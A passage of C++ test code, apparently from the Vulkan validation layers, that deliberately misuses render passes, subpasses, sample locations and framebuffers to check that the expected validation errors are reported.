TEST_DESCRIPTION( "Test that renderpass initial/final layouts 
match up with the usage bits set for each attachment of the framebuffer"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); bool maintenance2Supported = rp2Supported; // Check for VK_KHR_maintenance2 if (!rp2Supported && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE2_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE2_EXTENSION_NAME); maintenance2Supported = true; } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); if (m_device->props.apiVersion >= VK_API_VERSION_1_1) { maintenance2Supported = true; } // Create an input attachment view VkImageObj iai(m_device); iai.InitNoLayout(128, 128, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL); ASSERT_TRUE(iai.initialized()); VkImageView iav; VkImageViewCreateInfo iavci = {}; iavci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; iavci.pNext = nullptr; iavci.image = iai.handle(); iavci.viewType = VK_IMAGE_VIEW_TYPE_2D; iavci.format = VK_FORMAT_R8G8B8A8_UNORM; iavci.subresourceRange.layerCount = 1; iavci.subresourceRange.baseMipLevel = 0; iavci.subresourceRange.levelCount = 1; iavci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; vk::CreateImageView(m_device->device(), &iavci, NULL, &iav); // Create a color attachment view VkImageObj cai(m_device); cai.InitNoLayout(128, 128, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL); ASSERT_TRUE(cai.initialized()); VkImageView cav; VkImageViewCreateInfo cavci = {}; cavci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; cavci.pNext = nullptr; cavci.image = cai.handle(); cavci.viewType = VK_IMAGE_VIEW_TYPE_2D; cavci.format = VK_FORMAT_R8G8B8A8_UNORM; cavci.subresourceRange.layerCount = 1; cavci.subresourceRange.baseMipLevel = 0; cavci.subresourceRange.levelCount = 1; cavci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; vk::CreateImageView(m_device->device(), &cavci, NULL, &cav); // Create a renderPass with those attachments VkAttachmentDescription descriptions[] = { {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL}, {1, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_CLEAR, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL}}; VkAttachmentReference input_ref = {0, VK_IMAGE_LAYOUT_GENERAL}; VkAttachmentReference color_ref = {1, VK_IMAGE_LAYOUT_GENERAL}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 1, &input_ref, 1, &color_ref, nullptr, nullptr, 0, nullptr}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 2, descriptions, 1, &subpass, 0, nullptr}; VkRenderPass rp; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); // Create a framebuffer VkImageView views[] = {iav, cav}; VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 2, views, 128, 128, 1}; VkFramebuffer fb; 
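    // Each case below re-creates the render pass with an initialLayout that the corresponding framebuffer
    // attachment's usage flags cannot support, then expects vkCmdBeginRenderPass / vkCmdBeginRenderPass2 to
    // report the mismatch.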
vk::CreateFramebuffer(m_device->handle(), &fbci, nullptr, &fb); VkRenderPassBeginInfo rp_begin = {VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, nullptr, rp, fb, {{0, 0}, {128, 128}}, 0, nullptr}; VkRenderPass rp_invalid; // Initial layout is VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL but attachment doesn't support IMAGE_USAGE_COLOR_ATTACHMENT_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-00895", "VUID-vkCmdBeginRenderPass2-initialLayout-03094"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); // Initial layout is VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL but attachment doesn't support VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT // / VK_IMAGE_USAGE_SAMPLED_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_GENERAL; descriptions[1].initialLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-00897", "VUID-vkCmdBeginRenderPass2-initialLayout-03097"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); descriptions[1].initialLayout = VK_IMAGE_LAYOUT_GENERAL; // Initial layout is VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL but attachment doesn't support VK_IMAGE_USAGE_TRANSFER_SRC_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-00898", "VUID-vkCmdBeginRenderPass2-initialLayout-03098"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); // Initial layout is VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL but attachment doesn't support VK_IMAGE_USAGE_TRANSFER_DST_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-00899", "VUID-vkCmdBeginRenderPass2-initialLayout-03099"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); // Initial layout is VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL but attachment doesn't support // VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; const char *initial_layout_vuid_rp1 = maintenance2Supported ? 
"VUID-vkCmdBeginRenderPass-initialLayout-01758" : "VUID-vkCmdBeginRenderPass-initialLayout-00896"; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, initial_layout_vuid_rp1, "VUID-vkCmdBeginRenderPass2-initialLayout-03096"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); // Initial layout is VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL but attachment doesn't support // VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, initial_layout_vuid_rp1, "VUID-vkCmdBeginRenderPass2-initialLayout-03096"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); if (maintenance2Supported || rp2Supported) { // Initial layout is VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL but attachment doesn't support // VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-01758", "VUID-vkCmdBeginRenderPass2-initialLayout-03096"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); // Initial layout is VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL but attachment doesn't support // VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT descriptions[0].initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL; vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_invalid); rp_begin.renderPass = rp_invalid; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported, "VUID-vkCmdBeginRenderPass-initialLayout-01758", "VUID-vkCmdBeginRenderPass2-initialLayout-03096"); vk::DestroyRenderPass(m_device->handle(), rp_invalid, nullptr); } vk::DestroyRenderPass(m_device->device(), rp, nullptr); vk::DestroyFramebuffer(m_device->device(), fb, nullptr); vk::DestroyImageView(m_device->device(), iav, nullptr); vk::DestroyImageView(m_device->device(), cav, nullptr); } TEST_F(VkLayerTest, RenderPassBeginClearOpMismatch) { TEST_DESCRIPTION( "Begin a renderPass where clearValueCount is less than the number of renderPass attachments that use " "loadOp VK_ATTACHMENT_LOAD_OP_CLEAR."); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Create a renderPass with a single attachment that uses loadOp CLEAR VkAttachmentReference attach = {}; attach.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass = {}; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &attach; VkRenderPassCreateInfo rpci = {}; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; 
    rpci.attachmentCount = 1;
    VkAttachmentDescription attach_desc = {};
    attach_desc.format = VK_FORMAT_B8G8R8A8_UNORM;
    // Set loadOp to CLEAR
    attach_desc.loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR;
    attach_desc.samples = VK_SAMPLE_COUNT_1_BIT;
    attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL;
    rpci.pAttachments = &attach_desc;
    rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO;
    VkRenderPass rp;
    vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp);

    VkRenderPassBeginInfo rp_begin = {};
    rp_begin.sType = VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO;
    rp_begin.pNext = NULL;
    rp_begin.renderPass = renderPass();
    rp_begin.framebuffer = framebuffer();
    rp_begin.clearValueCount = 0;  // Should be 1

    TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, rp2Supported,
                        "VUID-VkRenderPassBeginInfo-clearValueCount-00902", "VUID-VkRenderPassBeginInfo-clearValueCount-00902");

    vk::DestroyRenderPass(m_device->device(), rp, NULL);
}

TEST_F(VkLayerTest, RenderPassBeginSampleLocationsInvalidIndicesEXT) {
    TEST_DESCRIPTION("Test that attachment indices and subpass indices specified by sample locations structures are valid");

    // Check for VK_KHR_get_physical_device_properties2
    if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) {
        m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME);
    }

    ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor));

    if (DeviceExtensionSupported(gpu(), nullptr, VK_EXT_SAMPLE_LOCATIONS_EXTENSION_NAME)) {
        m_device_extension_names.push_back(VK_EXT_SAMPLE_LOCATIONS_EXTENSION_NAME);
    } else {
        printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_EXT_SAMPLE_LOCATIONS_EXTENSION_NAME);
        return;
    }

    ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT));

    // Create a depth stencil image view
    VkImageObj image(m_device);
    image.Init(128, 128, 1, VK_FORMAT_D16_UNORM, VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL);
    ASSERT_TRUE(image.initialized());

    VkImageView dsv;
    VkImageViewCreateInfo dsvci = {};
    dsvci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO;
    dsvci.pNext = nullptr;
    dsvci.image = image.handle();
    dsvci.viewType = VK_IMAGE_VIEW_TYPE_2D;
    dsvci.format = VK_FORMAT_D16_UNORM;
    dsvci.subresourceRange.layerCount = 1;
    dsvci.subresourceRange.baseMipLevel = 0;
    dsvci.subresourceRange.levelCount = 1;
    dsvci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT;
    vk::CreateImageView(m_device->device(), &dsvci, NULL, &dsv);

    // Create a renderPass with a single attachment that uses loadOp CLEAR
    VkAttachmentDescription description = {0,
                                            VK_FORMAT_D16_UNORM,
                                            VK_SAMPLE_COUNT_1_BIT,
                                            VK_ATTACHMENT_LOAD_OP_LOAD,
                                            VK_ATTACHMENT_STORE_OP_DONT_CARE,
                                            VK_ATTACHMENT_LOAD_OP_CLEAR,
                                            VK_ATTACHMENT_STORE_OP_DONT_CARE,
                                            VK_IMAGE_LAYOUT_GENERAL,
                                            VK_IMAGE_LAYOUT_GENERAL};

    VkAttachmentReference depth_stencil_ref = {0, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL};

    VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, &depth_stencil_ref, 0,
                                    nullptr};

    VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, &description, 1, &subpass, 0, nullptr};

    VkRenderPass rp;
    vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp);

    // Create a framebuffer
    VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 1, &dsv, 128, 128, 1};
    VkFramebuffer fb;
    vk::CreateFramebuffer(m_device->handle(), &fbci, nullptr, &fb);

    VkSampleLocationEXT
sample_location = {0.5, 0.5}; VkSampleLocationsInfoEXT sample_locations_info = { VK_STRUCTURE_TYPE_SAMPLE_LOCATIONS_INFO_EXT, nullptr, VK_SAMPLE_COUNT_1_BIT, {1, 1}, 1, &sample_location}; VkAttachmentSampleLocationsEXT attachment_sample_locations = {0, sample_locations_info}; VkSubpassSampleLocationsEXT subpass_sample_locations = {0, sample_locations_info}; VkRenderPassSampleLocationsBeginInfoEXT rp_sl_begin = {VK_STRUCTURE_TYPE_RENDER_PASS_SAMPLE_LOCATIONS_BEGIN_INFO_EXT, nullptr, 1, &attachment_sample_locations, 1, &subpass_sample_locations}; VkRenderPassBeginInfo rp_begin = { VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, &rp_sl_begin, rp, fb, {{0, 0}, {128, 128}}, 0, nullptr}; attachment_sample_locations.attachmentIndex = 1; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, false, "VUID-VkAttachmentSampleLocationsEXT-attachmentIndex-01531", nullptr); attachment_sample_locations.attachmentIndex = 0; subpass_sample_locations.subpassIndex = 1; TestRenderPassBegin(m_errorMonitor, m_device->device(), m_commandBuffer->handle(), &rp_begin, false, "VUID-VkSubpassSampleLocationsEXT-subpassIndex-01532", nullptr); subpass_sample_locations.subpassIndex = 0; vk::DestroyRenderPass(m_device->device(), rp, nullptr); vk::DestroyFramebuffer(m_device->device(), fb, nullptr); vk::DestroyImageView(m_device->device(), dsv, nullptr); } TEST_F(VkLayerTest, RenderPassNextSubpassExcessive) { TEST_DESCRIPTION("Test that an error is produced when CmdNextSubpass is called too many times in a renderpass instance"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); PFN_vkCmdNextSubpass2KHR vkCmdNextSubpass2KHR = nullptr; bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); if (rp2Supported) { vkCmdNextSubpass2KHR = (PFN_vkCmdNextSubpass2KHR)vk::GetDeviceProcAddr(m_device->device(), "vkCmdNextSubpass2KHR"); } ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdNextSubpass-None-00909"); vk::CmdNextSubpass(m_commandBuffer->handle(), VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->VerifyFound(); if (rp2Supported) { VkSubpassBeginInfoKHR subpassBeginInfo = {VK_STRUCTURE_TYPE_SUBPASS_BEGIN_INFO_KHR, nullptr, VK_SUBPASS_CONTENTS_INLINE}; VkSubpassEndInfoKHR subpassEndInfo = {VK_STRUCTURE_TYPE_SUBPASS_END_INFO_KHR, nullptr}; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdNextSubpass2-None-03102"); vkCmdNextSubpass2KHR(m_commandBuffer->handle(), &subpassBeginInfo, &subpassEndInfo); m_errorMonitor->VerifyFound(); } m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); } TEST_F(VkLayerTest, RenderPassEndBeforeFinalSubpass) { TEST_DESCRIPTION("Test that an error is produced when CmdEndRenderPass is called before the final subpass has been reached"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); PFN_vkCmdEndRenderPass2KHR 
vkCmdEndRenderPass2KHR = nullptr; bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); if (rp2Supported) { vkCmdEndRenderPass2KHR = (PFN_vkCmdEndRenderPass2KHR)vk::GetDeviceProcAddr(m_device->device(), "vkCmdEndRenderPass2KHR"); } VkSubpassDescription sd[2] = {{0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}}; VkRenderPassCreateInfo rcpi = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 0, nullptr, 2, sd, 0, nullptr}; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rcpi, nullptr, &rp); ASSERT_VK_SUCCESS(err); VkFramebufferCreateInfo fbci = {VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO, nullptr, 0, rp, 0, nullptr, 16, 16, 1}; VkFramebuffer fb; err = vk::CreateFramebuffer(m_device->device(), &fbci, nullptr, &fb); ASSERT_VK_SUCCESS(err); m_commandBuffer->begin(); VkRenderPassBeginInfo rpbi = {VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO, nullptr, rp, fb, {{0, 0}, {16, 16}}, 0, nullptr}; vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdEndRenderPass-None-00910"); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_errorMonitor->VerifyFound(); if (rp2Supported) { VkSubpassEndInfoKHR subpassEndInfo = {VK_STRUCTURE_TYPE_SUBPASS_END_INFO_KHR, nullptr}; m_commandBuffer->reset(); m_commandBuffer->begin(); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdEndRenderPass2-None-03103"); vkCmdEndRenderPass2KHR(m_commandBuffer->handle(), &subpassEndInfo); m_errorMonitor->VerifyFound(); } // Clean up. 
vk::DestroyFramebuffer(m_device->device(), fb, nullptr); vk::DestroyRenderPass(m_device->device(), rp, nullptr); } TEST_F(VkLayerTest, RenderPassDestroyWhileInUse) { TEST_DESCRIPTION("Delete in-use renderPass."); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); // Create simple renderpass VkAttachmentReference attach = {}; attach.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass = {}; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &attach; VkRenderPassCreateInfo rpci = {}; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; rpci.attachmentCount = 1; VkAttachmentDescription attach_desc = {}; attach_desc.format = VK_FORMAT_B8G8R8A8_UNORM; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; rpci.pAttachments = &attach_desc; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); m_errorMonitor->ExpectSuccess(); m_commandBuffer->begin(); VkRenderPassBeginInfo rpbi = {}; rpbi.sType = VK_STRUCTURE_TYPE_RENDER_PASS_BEGIN_INFO; rpbi.framebuffer = m_framebuffer; rpbi.renderPass = rp; m_commandBuffer->BeginRenderPass(rpbi); m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyNotFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkDestroyRenderPass-renderPass-00873"); vk::DestroyRenderPass(m_device->device(), rp, nullptr); m_errorMonitor->VerifyFound(); // Wait for queue to complete so we can safely destroy rp vk::QueueWaitIdle(m_device->m_queue); m_errorMonitor->SetUnexpectedError("If renderPass is not VK_NULL_HANDLE, renderPass must be a valid VkRenderPass handle"); m_errorMonitor->SetUnexpectedError("Was it created? Has it already been destroyed?"); vk::DestroyRenderPass(m_device->device(), rp, nullptr); } TEST_F(VkLayerTest, FramebufferCreateErrors) { TEST_DESCRIPTION( "Hit errors when attempting to create a framebuffer :\n" " 1. Mismatch between framebuffer & renderPass attachmentCount\n" " 2. Use a color image as depthStencil attachment\n" " 3. Mismatch framebuffer & renderPass attachment formats\n" " 4. Mismatch framebuffer & renderPass attachment #samples\n" " 5. Framebuffer attachment w/ non-1 mip-levels\n" " 6. Framebuffer with more than 1 layer with a multiview renderpass\n" " 7. Framebuffer attachment where dimensions don't match\n" " 8. Framebuffer attachment where dimensions don't match\n" " 9. Framebuffer attachment w/o identity swizzle\n" " 10. framebuffer dimensions exceed physical device limits\n" " 11. 
null pAttachments\n"); // Check for VK_KHR_get_physical_device_properties2 bool push_physical_device_properties_2_support = InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); if (push_physical_device_properties_2_support) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool push_fragment_density_support = false; if (push_physical_device_properties_2_support) { push_fragment_density_support = DeviceExtensionSupported(gpu(), nullptr, VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME); if (push_fragment_density_support) m_device_extension_names.push_back(VK_EXT_FRAGMENT_DENSITY_MAP_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, 0)); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkFramebufferCreateInfo-attachmentCount-00876"); bool rp2_supported = CheckCreateRenderPass2Support(this, m_device_extension_names); bool multiviewSupported = rp2_supported || (m_device->props.apiVersion >= VK_API_VERSION_1_1); if (!multiviewSupported && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MULTIVIEW_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MULTIVIEW_EXTENSION_NAME); multiviewSupported = true; } // Create a renderPass with a single color attachment VkAttachmentReference attach = {}; attach.layout = VK_IMAGE_LAYOUT_GENERAL; VkSubpassDescription subpass = {}; subpass.pColorAttachments = &attach; VkRenderPassCreateInfo rpci = {}; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; rpci.attachmentCount = 1; VkAttachmentDescription attach_desc = {}; attach_desc.format = VK_FORMAT_B8G8R8A8_UNORM; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; rpci.pAttachments = &attach_desc; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp; VkResult err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); ASSERT_VK_SUCCESS(err); VkImageView ivs[2]; ivs[0] = m_renderTargets[0]->targetView(VK_FORMAT_B8G8R8A8_UNORM); ivs[1] = m_renderTargets[0]->targetView(VK_FORMAT_B8G8R8A8_UNORM); VkFramebufferCreateInfo fb_info = {}; fb_info.sType = VK_STRUCTURE_TYPE_FRAMEBUFFER_CREATE_INFO; fb_info.pNext = NULL; fb_info.renderPass = rp; // Set mis-matching attachmentCount fb_info.attachmentCount = 2; fb_info.pAttachments = ivs; fb_info.width = 100; fb_info.height = 100; fb_info.layers = 1; VkFramebuffer fb; err = vk::CreateFramebuffer(device(), &fb_info, NULL, &fb); m_errorMonitor->VerifyFound(); if (err == VK_SUCCESS) { vk::DestroyFramebuffer(m_device->device(), fb, NULL); } vk::DestroyRenderPass(m_device->device(), rp, NULL); // Create a renderPass with a depth-stencil attachment created with // IMAGE_USAGE_COLOR_ATTACHMENT // Add our color attachment to pDepthStencilAttachment subpass.pDepthStencilAttachment = &attach; subpass.pColorAttachments = NULL; VkRenderPass rp_ds; err = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp_ds); ASSERT_VK_SUCCESS(err); // Set correct attachment count, but attachment has COLOR usage bit set fb_info.attachmentCount = 1; fb_info.renderPass = rp_ds; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, 